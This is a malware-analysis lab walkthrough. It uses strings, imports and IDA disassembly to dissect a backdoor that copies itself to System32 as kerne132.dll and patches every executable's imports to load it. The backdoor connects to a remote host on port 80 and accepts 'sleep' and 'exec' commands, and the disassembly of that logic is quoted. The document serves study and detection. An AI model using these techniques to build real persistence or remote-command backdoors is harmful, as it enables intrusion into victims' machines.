This program achieves persistence by writing a DLL to C:\Windows\System32 and modifying every .exe file on the system to import that DLL.
The program is hard-coded to use the filename kerne132.dll, which makes a good signature. (Note the use of the number
1 instead of the letter l.) The program uses a hard-coded
mutex named SADFHUHF.
The purpose of this program is to create a difficult-to-remove backdoor that connects to a remote host. The backdoor has two commands: one to execute a command and one to sleep.
This program is very hard to remove because it infects every .exe file on the system. It’s probably best in this case to restore from backups. If restoring from backups is particularly difficult, you could leave the malicious kerne132.dll file and modify it to remove the malicious content. Alternatively, you could copy kernel32.dll and name it kerne132.dll, or write a program to undo all changes to the PE files.
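The last option, a program that undoes the PE changes, can be sketched in a few lines. This is only an illustration under stated assumptions: the function name restore_import_name and the sample bytes are hypothetical, the buffer is a synthetic stand-in rather than a real executable, and a raw byte replacement does not repair the bound import table that the malware zeroes out. A real cleanup tool would parse the import directory and work on copies of the files.

```python
IMPOSTER = b"kerne132.dll"
ORIGINAL = b"kernel32.dll"


def restore_import_name(image: bytes) -> bytes:
    """Return a copy of image with the imposter DLL name swapped back."""
    # Both names are 12 bytes long, so no offsets inside the file shift.
    assert len(IMPOSTER) == len(ORIGINAL)
    return image.replace(IMPOSTER, ORIGINAL)


# Synthetic stand-in for a patched executable, not a real PE file.
patched = b"MZ\x90\x00" + b"\x00" * 12 + b"kerne132.dll\x00user32.dll\x00"
restored = restore_import_name(patched)
print(restored)
```

Because the two names have the same length, the replacement leaves every other offset in the file untouched, which is the same property the malware relies on when it patches the name in the first place.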
First, we’ll look at Lab07-03.exe using basic static analysis techniques. When we run Strings on the executable, we get the usual invalid strings and the imported functions. We also get days of the week, months of the year, and other strings that are part of the library code, not part of the malicious executable.
The following listing shows that the code has several interesting strings.
kerne132.dll
.exe
WARNING_THIS_WILL_DESTROY_YOUR_MACHINE
C:\Windows\System32\Kernel32.dll
Lab07-03.dll
Kernel32.
C:\windows\system32\kerne132.dll
C:\*
The string kerne132.dll is clearly designed to look like kernel32.dll but replaces the l with a 1.
For the remainder of this section, the imposter kerne132.dll will be in bold to make it easier to differentiate from kernel32.dll.
The string Lab07-03.dll tells us that the
.exe may access the DLL for this lab in some way. The string WARNING_THIS_WILL_DESTROY_YOUR_MACHINE is interesting, but it’s
actually an artifact of the modifications made to this malware for this book. Normal malware would
not contain this string, and we’ll see more about its usage in the malware later.
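A lookalike name such as this one is easy to flag automatically. The following is a minimal sketch, assuming a small, hypothetical table of confusable characters (1 for l, 0 for o, capital I for l); the function name looks_like is ours and is not part of any tool used in this lab.

```python
def looks_like(candidate: str, legit: str) -> bool:
    """Return True if candidate matches legit only after undoing lookalike swaps."""
    # Hypothetical, deliberately small table of confusable characters.
    confusable = str.maketrans({"1": "l", "0": "o", "I": "l"})
    normalized_candidate = candidate.translate(confusable).lower()
    normalized_legit = legit.translate(confusable).lower()
    # An exact (case-insensitive) match is the real file, not an imposter.
    if candidate.lower() == legit.lower():
        return False
    return normalized_candidate == normalized_legit


print(looks_like("kerne132.dll", "kernel32.dll"))
print(looks_like("kernel32.dll", "kernel32.dll"))
print(looks_like("user32.dll", "kernel32.dll"))
```

A check like this could be run over the filenames in C:\Windows\System32 as a quick host-based indicator.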
Next, we examine the imports for Lab07-03.exe. The most interesting of these are as follows:
CreateFileA
CreateFileMappingA
MapViewOfFile
IsBadReadPtr
UnmapViewOfFile
CloseHandle
FindFirstFileA
FindClose
FindNextFileA
CopyFileA
The imports CreateFileA, CreateFileMappingA, and MapViewOfFile tell us that
this program probably opens a file and maps it into memory. The FindFirstFileA and FindNextFileA combination tells us
that the program probably searches directories and uses CopyFileA
to copy files that it finds. The fact that the program does not import
Lab07-03.dll (or use any of the functions from the DLL), LoadLibrary, or GetProcAddress suggests
that it probably doesn’t load that DLL at runtime. This behavior is suspect and something we
need to examine as part of our analysis.
Next, we check the DLL for any interesting strings and imports and find a few strings worth investigating, as follows:
hello
127.26.152.13
sleep
exec
The most interesting string is an IP address, 127.26.152.13, that the malware might connect to. (You can set up your network-based
sensors to look for activity to this address.) We also see the strings hello, sleep, and exec, which we should examine when we open the program in IDA Pro.
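To show how strings like these can be pulled out of a binary and filtered for network indicators, here is a rough sketch. It is not the Strings utility itself: the helper names ascii_strings and ipv4_candidates are hypothetical, and the sample bytes are a synthetic buffer built from the strings above rather than the real DLL.

```python
import re


def ascii_strings(data, min_len=4):
    """Return runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [match.decode("ascii") for match in re.findall(pattern, data)]


IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def ipv4_candidates(strings):
    """Keep only strings shaped like dotted-quad IPv4 addresses."""
    return [
        s for s in strings
        if IPV4.match(s) and all(int(part) <= 255 for part in s.split("."))
    ]


# Synthetic buffer standing in for part of the DLL's data section.
sample = b"\x00\x01hello\x00127.26.152.13\x00sleep\x00exec\x00\xff\xfe"
found = ascii_strings(sample)
print(found)
print(ipv4_candidates(found))
```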
Next, we check the imports for Lab07-03.dll. We see that the imports from
ws2_32.dll contain all the functions necessary to send and receive data over a
network. Also of note is the CreateProcess function, which tells
us that this program may create another process.
We also check the exports for Lab07-03.dll and see, oddly, that it has
none. Without any exports, it can’t be imported by another program, though a program could
still call LoadLibrary on a DLL with no exports. We’ll keep
this in mind when we look more closely at the DLL.
We next try basic dynamic analysis. When we run the executable, it exits quickly without much
noticeable activity. (We could try to run the DLL using rundll32,
but because the DLL has no exports, that won’t work.) Unfortunately, basic dynamic analysis
doesn’t tell us much.
The next step is to perform analysis using IDA Pro. Whether you start with the DLL or EXE is a matter of preference. We’ll start with the DLL because it’s simpler than the EXE.
When looking at the DLL in IDA Pro, we see no exports, but we do see an entry point. We should
navigate to DllMain, which is automatically labeled by IDA Pro.
Unlike the prior two labs, the DLL has a lot of code, and it would take a really long time to go
through each instruction. Instead, we use a simple trick and look only at call instructions, ignoring all other instructions. This can help you get a quick view of
the DLL’s functionality. Let’s see what the code would look like with only the relevant
call instructions.
10001015 call __alloca_probe
10001059 call ds:OpenMutexA
1000106E call ds:CreateMutexA
1000107E call ds:WSAStartup
10001092 call ds:socket
100010AF call ds:inet_addr
100010BB call ds:htons
100010CE call ds:connect
10001101 call ds:send
10001113 call ds:shutdown
10001132 call ds:recv
1000114B call ebp ; strncmp
10001159 call ds:Sleep
10001170 call ebp ; strncmp
100011AF call ebx ; CreateProcessA
100011C5 call ds:Sleep
The first call is to the library function __alloca_probe to allocate space on the stack. All we can tell here is that this function
uses a large stack. Following this are calls to OpenMutexA and
CreateMutexA, which, like the malware in Lab 7-1, are here to ensure that only one copy of the malware is running at
one time.
The other listed functions are needed to establish a connection with a remote socket, and to
transmit and receive data. This function ends with calls to Sleep
and CreateProcessA. At this point, we don’t know what data
is sent or received, or which process is being created, but we can guess at what this DLL does. The
best explanation for a function that sends and receives data and creates processes is that it is
designed to receive commands from a remote machine.
Now that we know what this function is doing, we need to see what data is being sent and
received. First, we check the destination address of the connection. A few lines before the connect call, we see a call to inet_addr with the fixed IP address of 127.26.152.13.
We also see that the port argument is 0x50, which is port 80, the
port normally used for web traffic.
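The values handed to inet_addr and htons can be reproduced to see what ends up in the sockaddr structure. This is a small illustration using Python's standard socket and struct modules rather than the Winsock calls themselves; the variable names are ours.

```python
import socket
import struct

port = 0x50  # the port argument seen in the disassembly

# htons produces network (big-endian) byte order for the 16-bit port.
port_network_bytes = struct.pack("!H", port)

# inet_addr-style conversion of the dotted-quad string to 4 raw bytes.
address_bytes = socket.inet_aton("127.26.152.13")

print(port)
print(port_network_bytes.hex())
print(address_bytes.hex())
```

Seeing the raw bytes can help when writing a network signature that matches on the packed address or port rather than on the text form.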
But what data is being communicated? The call to send is
shown in the following listing.
100010F3 push 0 ; flags
100010F5 repne scasb
100010F7 not ecx
100010F9 dec ecx
100010FA push ecx ; len
100010FB push offset ❶buf ; "hello"
10001100 push esi ; s
10001101 call ds:send
As you can see at ❶, the buf argument stores the data to be sent over the network, and IDA Pro recognizes that the
pointer to buf represents the string "hello" and labels it as such. This appears to be a greeting that the victim machine
sends to let the server know that it’s ready for a command.
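The repne scasb, not ecx, dec ecx sequence that computes the len argument is an inlined string-length calculation. The sketch below emulates it step by step. It assumes the usual setup that is not shown in the excerpt (ECX preloaded with 0xFFFFFFFF, AL set to zero, EDI pointing at the string); the function name scasb_strlen is hypothetical.

```python
MASK32 = 0xFFFFFFFF


def scasb_strlen(memory: bytes, start: int = 0) -> int:
    """Emulate repne scasb / not ecx / dec ecx on a NUL-terminated string."""
    ecx = MASK32  # assumed setup: or ecx, 0FFFFFFFFh
    al = 0        # assumed setup: xor eax, eax
    edi = start
    # repne scasb: scan one byte per iteration, decrementing ECX each time,
    # and stop right after the byte that equals AL.
    while ecx != 0:
        byte = memory[edi]
        edi += 1
        ecx = (ecx - 1) & MASK32
        if byte == al:
            break
    ecx = ~ecx & MASK32       # not ecx: bytes scanned, terminator included
    ecx = (ecx - 1) & MASK32  # dec ecx: drop the terminator from the count
    return ecx


print(scasb_strlen(b"hello\x00"))
```

For "hello", six bytes are scanned including the terminator, so the result after dec ecx is 5, the length pushed as len.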
Next, we can see what data the program is expecting in response, as follows:
10001124 lea ❸eax, [esp+120Ch+buf]
1000112B push 1000h ; len
10001130 push eax ; ❷buf
10001131 push esi ; s
10001132 call ❶ds:recv
If we go to the call to recv
❶, we see that the buffer on the stack has been labeled
by IDA Pro at ❷. Notice that the instruction that first
accesses buf is an lea
instruction at ❸. The instruction doesn’t
dereference the value stored at that location, but instead only obtains a pointer to that location. The call to
recv will store the incoming network traffic on the stack.
Now we must determine what the program is doing with the response. We see the buffer value checked a few lines later at ❶, as shown in the following listing.
1000113C ❶lea ecx, [esp+1208h+buf]
10001143 push 5 ; size_t
10001145 push ecx ; char *
10001146 push offset aSleep ; "sleep"
1000114B ❷call ebp ; strncmp
1000114D add esp, 0Ch
10001150 ❸test eax, eax
10001152 jnz short loc_10001161
10001154 push 60000h ; dwMilliseconds
10001159 call ds:Sleep
The buffer accessed at ❶ is the same as the one
from the previous listing, even though the offset from ESP is different (esp+1208+buf in one and esp+120C+buf in the other).
The difference is due to the fact that the size of the stack has changed. IDA Pro labels both
buf to make it easy to tell that they’re the same
value.
This code calls strncmp at ❷, and it checks to see if the first five characters are the string sleep. Then, immediately after the function call, it checks to see if the
return value is 0 at ❸; if so, it calls the Sleep function with 0x60000 milliseconds, which is about 393 seconds. This tells us that if the remote
server sends the command sleep, the program will call the
Sleep function.
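The dwMilliseconds value is easy to misread because it is hexadecimal. As a quick worked conversion:

```python
sleep_ms = 0x60000           # dwMilliseconds pushed before the Sleep call
sleep_seconds = sleep_ms / 1000
sleep_minutes = sleep_seconds / 60

print(sleep_ms)
print(sleep_seconds)
print(round(sleep_minutes, 2))
```

So the value is 393,216 milliseconds, or roughly six and a half minutes, not the 60 seconds the hex digits might suggest at a glance.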
We see the buffer accessed again a few instructions later, as follows:
10001161 lea edx, [esp+1208h+buf]
10001168 push 4 ; size_t
1000116A push edx ; char *
1000116B push offset aExec ; "exec"
10001170 ❶call ebp ; strncmp
10001172 add esp, 0Ch
10001175 test eax, eax
10001177 ❷jnz short loc_100011B6
10001179 mov ecx, 11h
1000117E lea edi, [esp+1208h+StartupInfo]
10001182 rep stosd
10001184 lea eax, [esp+1208h+ProcessInformation]
10001188 lea ecx, [esp+1208h+StartupInfo]
1000118C push eax ; lpProcessInformation
1000118D push ecx ; lpStartupInfo
1000118E push 0 ; lpCurrentDirectory
10001190 push 0 ; lpEnvironment
10001192 push 8000000h ; dwCreationFlags
10001197 push 1 ; bInheritHandles
10001199 push 0 ; lpThreadAttributes
1000119B lea edx, [esp+1224h+❹CommandLine]
100011A2 push 0 ; lpProcessAttributes
100011A4 push edx ; lpCommandLine
100011A5 push 0 ; lpApplicationName
100011A7 mov [esp+1230h+StartupInfo.cb], 44h
100011AF ❸call ebx ; CreateProcessA
This time, we see that the code is checking to see if the buffer begins with exec. If so, the strncmp function will
return 0, as shown at ❶, and the code will fall through
the jnz instruction at ❷ and call the CreateProcessA function.
There are a lot of parameters to the CreateProcessA
function shown at ❸, but the most interesting is the
CommandLine parameter at ❹, which tells us the process that will be created. The listing suggests that the string
in CommandLine was stored on the stack somewhere earlier in code,
and we need to determine where. We search backward in our code to find CommandLine by placing the cursor on the CommandLine
operand to highlight all instances within this function where the CommandLine value is accessed. Unfortunately, when you look through the whole function,
you’ll see that the CommandLine pointer does not seem to be
accessed or set elsewhere in the function.
At this point, we’re stuck. We see that CreateProcessA is called and that the program to be run is stored in CommandLine, but we don’t see CommandLine written anywhere. CommandLine must be
written prior to being used as a parameter to CreateProcessA, so
we still have some work to do.
This is a tricky case where IDA Pro’s automatic labeling has actually made it more
difficult to identify where CommandLine was written. The IDA Pro
function information shown in the following listing tells us that CommandLine corresponds to the value of 0x0FFB at
❷.
10001010 ; BOOL __stdcall DllMain(...)
10001010 _DllMain@12 proc near
10001010
10001010 hObject = dword ptr -11F8h
10001010 name = sockaddr ptr -11F4h
10001010 ProcessInformation = _PROCESS_INFORMATION ptr -11E4h
10001010 StartupInfo = _STARTUPINFOA ptr -11D4h
10001010 WSAData = WSAData ptr -1190h
10001010 buf = ❶ byte ptr -1000h
10001010 CommandLine = ❷ byte ptr -0FFBh
10001010 arg_4 = dword ptr 8
Remember our receive buffer started at 0x1000 ❶,
and that this value is set using the lea instruction, which tells
us that the data itself is stored on the stack, and is not just a pointer to the data. Also, the
fact that 0x0FFB is 5 bytes into our receive buffer tells us that
the command to be executed is whatever is stored 5 bytes into our receive buffer. In this case, that
means that the data received from the remote server would be exec
FullPathOfProgramToRun. When the malware
receives the exec
FullPathOfProgramToRun command string from
the remote server, it will call CreateProcessA with
FullPathOfProgramToRun.
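The relationship between buf and CommandLine can be modeled to show how a received message is interpreted. This is an analysis aid only, written under stated assumptions: parse_command is a hypothetical name, the function only classifies a buffer and never launches anything, and the example path is made up for illustration.

```python
BUF_OFFSET = -0x1000           # buf, from the stack layout
COMMAND_LINE_OFFSET = -0x0FFB  # CommandLine, from the stack layout
ARG_START = COMMAND_LINE_OFFSET - BUF_OFFSET  # 5 bytes into the buffer


def parse_command(buf: bytes):
    """Classify a received buffer the way the two strncmp checks do."""
    if buf[:5] == b"sleep":
        return ("sleep", None)
    if buf[:4] == b"exec":
        # CommandLine is simply buf + 5, read up to the first NUL byte.
        end = buf.find(b"\x00", ARG_START)
        if end == -1:
            end = len(buf)
        return ("exec", buf[ARG_START:end].decode("ascii", errors="replace"))
    return ("unknown", None)


print(ARG_START)
print(parse_command(b"sleep\x00"))
print(parse_command(b"exec C:\\Windows\\notepad.exe\x00"))
```

The five bytes skipped are the four characters of exec plus the separator that follows it, which is why the path begins exactly at CommandLine.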
This brings us to the end of this function and DLL. We now know that this DLL implements backdoor functionality that allows the attacker to launch an executable on the system by sending a response to a packet on port 80. There’s still the mystery of why this DLL has no exported functions and how this DLL is run, and the content of the DLL offers no explanations, so we’ll need to defer those questions until later.
Next, we navigate to the main method in the executable. One
of the first things we see is a check for the command-line arguments, as shown in the following
listing.
00401440 mov eax, [esp+argc]
00401444 sub esp, 44h
00401447 ❶cmp eax, 2
0040144A push ebx
0040144B push ebp
0040144C push esi
0040144D push edi
0040144E ❷jnz loc_401813
00401454 mov eax, [esp+54h+argv]
00401458 mov esi, offset aWarning_this_w ; "WARNING_THIS_WILL_DESTROY_YOUR_MACHINE"
0040145D ❸mov eax, [eax+4]
00401460 ; CODE XREF: _main+42 j
00401460 ❹mov dl, [eax]
00401462 mov bl, [esi]
00401464 mov cl, dl
00401466 cmp dl, bl
00401468 jnz short loc_401488
0040146A test cl, cl
0040146C jz short loc_401484
0040146E mov dl, [eax+1]
00401471 mov bl, [esi+1]
00401474 mov cl, dl
00401476 cmp dl, bl
00401478 jnz short loc_401488
0040147A add eax, 2
0040147D add esi, 2
00401480 test cl, cl
00401482 ❺jnz short loc_401460
00401484 ; CODE XREF: _main+2C j
00401484 xor eax, eax
00401486 jmp short loc_40148D
The first comparison at ❶ checks to see if the
argument count is 2. If the argument count is not 2, the code jumps at ❷ to another section of code, which prematurely exits. (This is
what happened when we tried to perform dynamic analysis and the program ended quickly.) The program
then moves argv[1] into EAX at ❸ and the "WARNING_THIS_WILL_DESTROY_YOUR_MACHINE"
string into ESI. The loop between ❹ and ❺ compares, byte by byte, the strings that ESI and EAX point to. If they are not the
same, the program jumps to a location that will return from this function without doing anything
else.
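The loop is an inlined string comparison that has been unrolled to handle two bytes per iteration. A rough model of its control flow is shown below; the function name unrolled_equal is hypothetical, and both inputs are assumed to be NUL-terminated, as C strings are.

```python
def unrolled_equal(a: bytes, b: bytes) -> bool:
    """Model the two-bytes-per-iteration comparison loop from main."""
    i = 0
    while True:
        # First byte of the pair: cmp dl, bl / jnz mismatch / test cl, cl / jz equal
        if a[i] != b[i]:
            return False
        if a[i] == 0:
            return True
        # Second byte of the pair: same checks at offset +1
        if a[i + 1] != b[i + 1]:
            return False
        if a[i + 1] == 0:
            return True
        i += 2  # add eax, 2 / add esi, 2, then loop


expected = b"WARNING_THIS_WILL_DESTROY_YOUR_MACHINE\x00"
print(unrolled_equal(expected, expected))
print(unrolled_equal(b"WARNING\x00", expected))
```

Recognizing this pattern as a plain string comparison saves the time of tracing each register by hand.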
We’ve learned that this program exits immediately unless the correct parameters are specified on the command line. The correct usage of this program is as follows:
Lab07-03.exe WARNING_THIS_WILL_DESTROY_YOUR_MACHINE
Malware that has different behavior or requires command-line arguments is realistic, although this message is not. The arguments required by malware will normally be more cryptic. We chose to use this argument to ensure that you won’t accidentally run this on an important machine, because it can damage your computer and is difficult to remove.
At this point, we could go back and redo our basic dynamic analysis and enter the correct parameters to get the program to execute more of its code, but to keep the momentum going, we’ll continue with the static analysis. If we get stuck, we can perform basic dynamic analysis.
Continuing in IDA Pro, we see calls to CreateFile, CreateFileMapping, and MapViewOfFile
where it opens kernel32.dll and our DLL Lab07-03.dll.
Looking through this function, we see a lot of complicated reads and writes to memory. We could
carefully analyze every instruction, but that would take too long, so let’s try looking at the
function calls first.
We see two other function calls: sub_401040 and sub_401070. Each of these functions is relatively short, and neither calls
any other function. The functions are comparing memory, calculating offsets, or writing to memory.
Because we’re not trying to determine every last operation of the program, we can skip the
tedious memory-operation functions. (Analyzing time-consuming functions like these is a common trap
and should be avoided unless absolutely necessary.) We also see a lot of arithmetic, as well as
memory movement and comparisons in this function, probably within the two open files
(kernel32.dll and Lab07-03.dll). The program is reading
and writing the two open files. We could painstakingly track every instruction to see what changes
are being made, but it’s much easier to skip over that for now and use dynamic analysis to
observe how the files are accessed and modified.
Scrolling down in IDA Pro, we see more interesting code that calls Windows API functions.
First, it calls CloseHandle on the two open files, so we know
that the malware is finished editing those files. Then it calls CopyFile, which copies Lab07-03.dll and places it in
C:\Windows\System32\kerne132.dll, which is clearly meant to look like
kernel32.dll. We can guess that kerne132.dll will be used to run in place of
kernel32.dll, but at this point, we don’t know how kerne132.dll will be loaded.
The calls to CloseHandle and CopyFile tell us that this portion of code is complete, and the next section of code
probably performs a separate logical task. We continue to look through the main method, and near the end, we see another function call that takes the string
argument C:\\*, as follows:
00401806 push offset aC ; "C:\\*"
0040180B call sub_4011E0
Unlike the other functions called by main, sub_4011E0 calls several other imported functions and looks interesting.
Navigating to sub_4011E0, we would expect to see that IDA Pro has
named the first argument to the function as arg_0, but it has
labeled it lpFilename instead. It knows that it is a filename,
because it is used as a parameter to a Windows API function that accepts a filename as a parameter.
One of the first things this function does is call FindFirstFile
on C:\\* to search the C: drive.
Following the call to FindFirstFile, we see a lot of
arithmetic and comparisons. This is another tedious and time-consuming function that we should skip
and return to only if we need more information later. The first call we see (other than malloc) is to sub_4011E0, the function
that we’re currently analyzing, which tells us that this is a recursive function.
The next function called is stricmp at ❶, as follows:
004013F6 ❶call ds:_stricmp
004013FC add esp, 0Ch
004013FF test eax, eax
00401401 jnz short loc_40140C
00401403 push ebp ; lpFileName
00401404 ❷call sub_4010A0
The arguments to the stricmp function are pushed onto the
stack about 30 instructions before the function call, but you can still find them by looking for the
most recent push instructions. The string comparison checks a
string against .exe, and if they match, the code calls the function sub_4010A0 at ❷.
We’ll finish reviewing this function before we see what sub_4010A0 does. Digging further, we see a call to FindNextFileA, and then we see a jump, which
indicates that this functionality is performed in a loop. At the end of the function, FindClose is called, and then the function ends with some
exception-handling code.
At this point, we can say with high confidence that this function is searching the C: drive for .exe files and doing something if a file has an .exe extension. The recursive call tells us that it’s probably searching the whole filesystem. We could go back and verify the details to be sure, but this would take a long time. A much better approach is to perform the basic dynamic analysis with Process Monitor (procmon) to verify that it’s searching every directory for files ending in .exe.
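The search pattern described here (walk every directory, compare each name's extension against .exe without regard to case) can be sketched as follows. This is an approximation for building intuition about what procmon should show, not a reconstruction of sub_4011E0: it uses os.walk in place of the FindFirstFile/FindNextFile recursion, the function name find_exe_files is hypothetical, and it runs against a throwaway temporary directory.

```python
import os
import tempfile


def find_exe_files(root):
    """Walk root recursively and return paths whose extension is .exe."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            # Case-insensitive comparison of the last four characters,
            # in the spirit of the stricmp call against ".exe".
            if name[-4:].lower() == ".exe":
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, "sub", "deeper"))
    for rel in ("a.exe", "b.txt",
                os.path.join("sub", "C.EXE"),
                os.path.join("sub", "deeper", "d.dll")):
        open(os.path.join(root, rel), "w").close()
    found_names = [os.path.basename(p) for p in find_exe_files(root)]

print(found_names)
```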
In order to see what this program is doing to .exe files, we need to
analyze the function sub_4010A0, which is called when the
.exe extension is found. sub_4010A0 is a
complex function that would take too long to analyze carefully. Instead, we once again look only at
the function calls. Here, we see that it first calls CreateFile,
CreateFileMapping, and MapViewOfFile to map the entire file into memory. Once the file is
mapped, the program can read or write it through ordinary memory accesses, without any additional function
calls. This complicates analysis because it’s harder to tell how the file is being modified. Again, we’ll just move quickly through this function and use dynamic
analysis to see what changes are made to the file.
Continuing to review the function, we see more arithmetic and calls to IsBadReadPtr, which verify that the pointer is valid. Then we see a call to stricmp as shown at ❶ in the
following listing.
0040116E push offset aKernel32_dll ; ❷"kernel32.dll"
00401173 ❻push ebx ; char *
00401174 ❶call ds:_stricmp
0040117A add esp, 8
0040117D test eax, eax
0040117F jnz short loc_4011A7
00401181 mov edi, ebx
00401183 or ecx, 0FFFFFFFFh
00401186 ❸repne scasb
00401188 not ecx
0040118A mov eax, ecx
0040118C mov esi, offset dword_403010
00401191 ❺mov edi, ebx
00401193 shr ecx, 2
00401196 ❹rep movsd
00401198 mov ecx, eax
0040119A and ecx, 3
0040119D rep movsb
At this call to stricmp, the program checks for a string
value of kernel32.dll at ❷. A few instructions later, we see that the program calls repne scasb at ❸ and rep movsd at ❹, which are functionally
equivalent to the strlen and memcpy functions. In order to see which memory address is being written by the memcpy call, we need to determine what’s stored in EDI, the register
used by the rep movsd instruction. EDI is loaded with the value
from EBX at ❺, so we need to see where EBX is
set.
We see that EBX is loaded with the value that we passed to stricmp at ❻. This means that if the function
finds the string kernel32.dll, the code replaces it with
something. To determine what it replaces that string with, we go to the rep
movsd instruction and see that the source is at offset dword_403010.
It doesn’t make sense for a DWORD value to overwrite
a string of kernel32.dll, but it does make sense for one string
value to overwrite another. The following listing shows what is stored at dword_403010.
00403010 dword_403010 dd 6E72656Bh ; DATA XREF:
00403014 dword_403014 dd 32333165h ; DATA XREF: _main+1B9r
00403018 dword_403018 dd 6C6C642Eh ; DATA XREF: _main+1C2r
0040301C dword_40301C dd 0 ; DATA XREF: _main+1CBr
You should recognize that bytes with hex values beginning with 3, 4, 5, 6, or 7 are usually printable ASCII characters. IDA
Pro has mislabeled our data as DWORDs. If we put the cursor on the same line as dword_403010 and press the A key on the keyboard, it will convert the data into the
string kerne132.dll.
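The same conversion can be checked by hand. Because x86 stores DWORDs in little-endian order, packing the four values as little-endian 32-bit integers recovers the bytes as they sit in memory:

```python
import struct

# The four DWORD values from the listing at 0x403010.
dwords = [0x6E72656B, 0x32333165, 0x6C6C642E, 0x00000000]

# "<4I" packs four unsigned 32-bit integers in little-endian byte order.
raw = struct.pack("<4I", *dwords)

# The string ends at the first NUL byte.
text = raw.split(b"\x00", 1)[0].decode("ascii")
print(text)
```

Each DWORD reads backward relative to the text (0x6E72656B is "nrek" when read high byte first), which is why the string is hard to spot in the raw listing.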
Now we know that the executable searches through the filesystem for every file ending in
.exe, finds a location in that file with the string kernel32.dll, and replaces it with kerne132.dll. From our previous analysis, we know
that Lab07-03.dll will be copied into C:\Windows\System32
and named kerne132.dll. At this point, we
can conclude that the malware modifies executables so that they access kerne132.dll instead of kernel32.dll, which
means that every modified executable loads kerne132.dll when it runs.
At this point, we’ve reached the end of the program and should be able to use dynamic analysis to fill in the gaps. We can use procmon to confirm that the program searches the filesystem for .exe files and then opens them. (Procmon will show the program opening every executable on the system.) If we select an .exe file that has been opened and check the imports directory, we confirm that the imports from kernel32.dll have been replaced with imports from kerne132.dll. This means that every executable on the system will attempt to load our malicious DLL—every single one.
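A quick triage check for modified executables is to look for the imposter name in the file's bytes. The sketch below is a raw byte scan, not a PE import parser, so it can only suggest which files deserve a closer look in a tool such as PEview. The function name find_imposter_offsets is hypothetical, and the two buffers are synthetic stand-ins rather than real executables.

```python
def find_imposter_offsets(image: bytes, needle: bytes = b"kerne132.dll"):
    """Return every offset at which the imposter DLL name appears."""
    offsets = []
    haystack = image.lower()  # import names are matched case-insensitively
    position = haystack.find(needle)
    while position != -1:
        offsets.append(position)
        position = haystack.find(needle, position + 1)
    return offsets


# Synthetic buffers: 16 bytes of filler followed by an import name.
clean = b"MZ" + b"\x00" * 14 + b"KERNEL32.dll\x00"
infected = b"MZ" + b"\x00" * 14 + b"kerne132.dll\x00"

print(find_imposter_offsets(clean))
print(find_imposter_offsets(infected))
```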
Next, we check to see how the program modified kernel32.dll and
Lab07-03.dll. We can calculate the MD5 hash of
kernel32.dll before and after the program runs to clearly see that this malware
does not modify kernel32.dll. When we open the modified
Lab07-03.dll (now named kerne132.dll), we see that it now has an export section. Opening it
in PEview, we see that it exports all the functions that kernel32.dll exported,
and that these are forwarded exports, so that the actual functionality is still in
kernel32.dll. The overall effect of this modification is that whenever an
.exe file is run on this computer, it will load the malicious kerne132.dll and run the code in DllMain. Other than that, all functionality will be unchanged, and the
code will execute as if the program were still calling the original
kernel32.dll.
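The before-and-after hash comparison mentioned above can be scripted. This is a minimal sketch using Python's hashlib; the helper name md5_file is ours, and the demonstration hashes a temporary file instead of the real kernel32.dll.

```python
import hashlib
import os
import tempfile


def md5_file(path, chunk_size=65536):
    """Return the hex MD5 digest of a file, read in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


with tempfile.TemporaryDirectory() as workdir:
    target = os.path.join(workdir, "sample.bin")
    with open(target, "wb") as handle:
        handle.write(b"original contents")
    before = md5_file(target)
    unchanged = md5_file(target)   # nothing touched the file
    with open(target, "ab") as handle:
        handle.write(b"!")         # simulate a modification
    after = md5_file(target)

print(before == unchanged)
print(before == after)
```

In the lab, the hash of kernel32.dll would be recorded before running the malware and compared afterward in the same way.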
We have now analyzed this malware completely. We could create host- and network-based signatures based on what we know, or we could write a malware report.
We did gloss over a lot of code in this analysis because it was too complicated, but did we
miss anything? We did, but nothing of importance to malware analysis. All of the code in the
main method that accessed kernel32.dll and
Lab07-03.dll was parsing the export section of
kernel32.dll and creating an export section in
Lab07-03.dll that exported the same functions and created forward entries to
kernel32.dll.
The malware needs to scan kernel32.dll for all the exports and create forward entries for the imposter kerne132.dll, because kernel32.dll is different on different systems. The tailored version of kerne132.dll exports exactly the same functions as the real kernel32.dll. In the function that modified the .exe, the code found the import directory so that it could change the kernel32.dll import name, and it set the bound import table to zero so that the stale bound addresses would not be used.
With careful and time-consuming analysis, we could determine what all of these functions do. However, when analyzing malware, time is often of the essence, and you should typically focus on what’s important. Try not to worry about the little details that won’t affect your analysis.